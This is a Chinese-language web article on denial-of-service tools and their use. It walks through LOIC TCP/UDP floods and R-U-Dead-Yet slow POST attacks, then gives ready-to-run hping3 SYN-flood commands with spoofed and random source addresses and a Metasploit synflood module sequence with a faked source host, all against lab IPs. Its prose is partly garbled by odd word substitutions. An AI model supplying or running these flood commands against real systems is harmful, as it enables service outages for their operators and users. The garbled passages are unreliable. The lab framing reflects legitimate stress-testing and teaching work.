dos攻击工具有哪些怎么使用?发布时间:2020/8/25 14:00:12 阅读次数:

  

拒绝服务攻击即是攻击者想办法让目标机器停止给予服务,常是网络黑客用的主动攻击手段之一。其实对服务器带宽进行的消耗性主动攻击只是拒绝服务攻击的一小部分,只需能够对目标造成麻烦,使某些服务被暂停甚至主机死机,都归属于拒绝服务攻击

LOICdos主动攻击小工具

LOIC最初是一款网络服务器压力测试工具,最初有Praetox科技,能够通过TCP和UDP flood方式形成DOS(拒绝服务攻击),测试方法网络服务器的性能。

首先选择目标IP地址(select your target),然后主动攻击选项(Attack option)

中有多种方法:直接用TCP 或者UDP 就可以了,效果非常明显。

TCP是上传TCP洪水攻击,主要是消耗网络服务器的资源,这种主动攻击,应该说这种压测,之前需要扫描服务器端口,针对端口号进行TCP flood。

UDP归属于强奸型的,杀敌一千,自损八百,就看测试者和网络服务器谁的性能,带宽更高,说白了就是拼资源。

压测下,网络服务器开始出现时延增大和丢包

备注:LOIC是上传报文时,源地址没有进行假造,是真实的IP地址,能够通过抓包查看。


LINUX:r-u-dead-yet dos主动攻击小工具

R-U-Dead-Yet是一款采用慢速HTTP POST请求方式进行DOS主动攻击的小工具,它给予了一个交互式控制台菜单,监测给定的URL,并允许用户选择哪些表格和字段应用于POST-based DOS主动攻击,操作非常简单。

这个小工具用起来也特别简单,不过前提是在Linux中安裝有python

开启配置文件,配置相关內容,配置相当的简单,我们仅需配置他的URL以及线程数即可,其他默认设置。

开启wireshark,运行程序,开始测试方法。

更有很多的用作压测的小工具,例如hping,siege,Meteasploit,stresslinux等等。

实战1:利用hping构造数据包进行DoS攻击

【实战步骤】

1.在kali中打开wireshark,监听网络数据包的传输

2.在终端输入“hping3 –S –a 1.1.1.1 --flood 192.168.111.129”其中,-S:发送SYN数据包;-a:伪造IP地址来源;--flood;只发送数据包,不考虑数据入站回显。在wireshark中监控。

3.在终端中输入命令“hping3 –S –V --flood --rand-source –c 10000 –d 150 –w 64 –p 135 192.168.111.129”其中, -V 冗余模式; --rand-source 使用随机源IP地址;-c:发送数据包数量;-d 发送每个数据包的大小;-w TCP窗口的大小;-p 攻击目标端口 可以随意设置。在wireshark中监控。

4.在终端输入命令“hping3 -c 100000 -S --flood -p 80 -a 1.1.1.1 192.168.49.141”。在实验中,目标win7的CPU资源被大量占用。

注:Hping是用于生成和解析TCP/IP数据包的开源工具,目前最新版是hping3,hping是安全审计、防火墙测试等工作的常用工具。

实战2:使用Meteasploit进行SynFlood攻击

【实战步骤】

1.在kali主机中打开wireshark,监听网络数据包的传输。

2.Msfconsole

3.Use auxiliary/dos/tcp/synflood

4.Set rhost 192.168.111.129

5.Set rport 135

6.Set shost 61.61.61.61 //设置虚构的IP地址

7.Exploit

8.Kali中打开Wireshark监听